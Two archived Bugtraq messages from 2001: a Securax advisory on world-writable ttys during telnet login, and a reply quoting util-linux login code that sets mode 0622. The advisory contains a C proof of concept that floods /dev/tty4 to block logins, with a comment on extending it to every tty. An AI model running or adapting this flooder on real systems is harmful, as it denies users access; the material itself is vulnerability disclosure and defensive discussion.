5907817 2001-01-01 16:02 +0100 /140 rader/ incubus <incubus@SECURAX.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-02 20:11 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: incubus@SECURAX.ORG
Mottagare: Bugtraq (import) <14566>
Ärende: Securax Advisory 13
------------------------------------------------------------
From: incubus <incubus@SECURAX.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <001701c07403$d18d5bc0$8656e0d5@pandora.be>
============================================================================
=
Securax-SA-13 Security
Advisory
belgian.networking.security
Dutch
============================================================================
=
Topic: all tty's can be written to when connecting
Announced: 2001-01-01
Affects: SuSE linux 6.4
probably all versions of unix (not tested)
============================================================================
=
Note: This entire advisory has been based upon trial and error
results. We
can not ensure the information below is 100% correct being that
we have
no source code to audit. This document is subject to change
without
prior notice.
I. Problem Description
-----------------------
when someone telnets to a unix system, the tty that will be assigned
to him will be writable for any user on the system. However, when he
is logged in, his tty will not be writable for all users. So if
someone would write data to a tty that is currently used by someone
who's logging in, that person won't be able to log in.
II. Impact
----------
The impact can be pretty severe, allowing no one to log in. the Proof
of concept code I created will demonstrate this, but only on 1 given
tty, this was done for 2 basic reasons, 1 so the kiddies can't play
to much with this code and seconde that this was written in less than
5 minutes (there was a lack of time)
/*
* ttwrite.c
* ---------
*
* written by ROOT-dude
*
* ok, this code is pretty shitty, but it works
* so far it's only set to flood tty4, but with a
* little modification, you can flood all tty's.
* I made this limitation so the kiddies can't
* play to much !!! (THIS IS ONLY PROOF OF
* CONCEPT CODE !!!!)
*
* I found this bug when I was messing around
* with this tool I found, called m0000h.sh
* which did the same but for /dev/pts,
* (that still isn't fixed btw) only "prob" is
* pts is for pseudo terminals, so a normal
* remote telnet connection will get a tty assinged
* and not a pts !!!!
*
* greetZ to :: incubus, f0bic, F_F, nostalgic,
* t-omicron, zym0t1c, tosh, vorlon, cicero,
* zoa, demongirl, so many others i forgot ...
*
* oh, yea, I nor the securax crew can't he held
* respronsible for any use or misuse of this
* source in any way, form, OR shape !
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define string "aaaaaaaaaa"
main()
{
int fd;
char tty[25];
bzero(tty, sizeof(tty));
strcat(tty, "/dev/tty4"); /* change to tty you want */
fd = open(tty, O_WRONLY);
while(fd < 0)
{
fd = open(tty, O_WRONLY);
}
while(fd)
{
write(fd, string, sizeof(string));
}
close(fd); /* no need to close it, but we'll code it anyway !*/
}
III. Solution
--------------
So far the only solution I've come up with is to close telnet, and
others servers like it !
IV. Credits
-------------
greetZ to :: incubus, f0bic, F_F, nostalgic, t-omicron, zym0t1c, tosh,
vorlon, cicero, zoa, demongirl, so many others I forgot ...
-R00T-dude(root@htw.zzn.com or ilja@securax.org).
============================================================================
=
For more information
ilja@securax.org
Website
http://www.securax.org
http://www.hexyn.be
Advisories/Text
http://www.securax.org/pers
http://www.hexyn.be/sections.php?op=listarticles&secid=1
----------------------------------------------------------------------------
-
(5907817) --------------------------------(Ombruten)
5912193 2001-01-03 23:10 +0200 /40 rader/ Jarno Huuskonen <jhuuskon@MESSI.UKU.FI>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-03 23:00 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: jhuuskon@MESSI.UKU.FI
Mottagare: Bugtraq (import) <14594>
Kommentar till text 5911354 av teleh0r <teleh0r@DOGLOVER.COM>
Ärende: Re: Securax Advisory 13
------------------------------------------------------------
From: Jarno Huuskonen <jhuuskon@MESSI.UKU.FI>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010103231044.A6267@laivuri63.uku.fi>
On Wed, Jan 03, teleh0r wrote:
> The problem is the way that the telnet daemon assigns a new user
> a terminal - when a user is telling the telnetd who he is, and
> what his password is, his terminal will be awaiting in /dev/pts/
> and writable by anyone. As soon as he has logged in, it will not.
It's the /bin/login (from util-linux package) that sets the
/dev/pts/? to mode 0622. (I think that when telnetd creates the tty
in /dev/pts it's created with gid=5,mode=0620 (or how you have
mounted /dev/pts)).
Here's the code from util-linux-2.10f/login-utils/login.c
if((chown(ttyn, 0, 0) == 0) && (chmod(ttyn, 0622) == 0)) {
tcsetattr(0,TCSAFLUSH,&ttt);
signal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us */
vhangup();
signal(SIGHUP, SIG_DFL);
}
Can somebody explain why on earth the tty mode is set to 0622 during
authentication (instead of 0600 or something similar) ? What's going
to break if I patch the chmod call to 0600 (at least telnetd seems to
work) ?
-Jarno
PS. At least AIX 4.3.3 seems to set the /dev/pts/? to:
c--------- 1 root system 28, 3 Jan 03 23:06 3
during telnet auth.
--
Jarno Huuskonen - System Administrator | Jarno.Huuskonen@uku.fi
University of Kuopio - Computer Centre | Work: +358 17 162822
PO BOX 1627, 70211 Kuopio, Finland | Mobile: +358 40 5388169
(5912193) --------------------------------(Ombruten)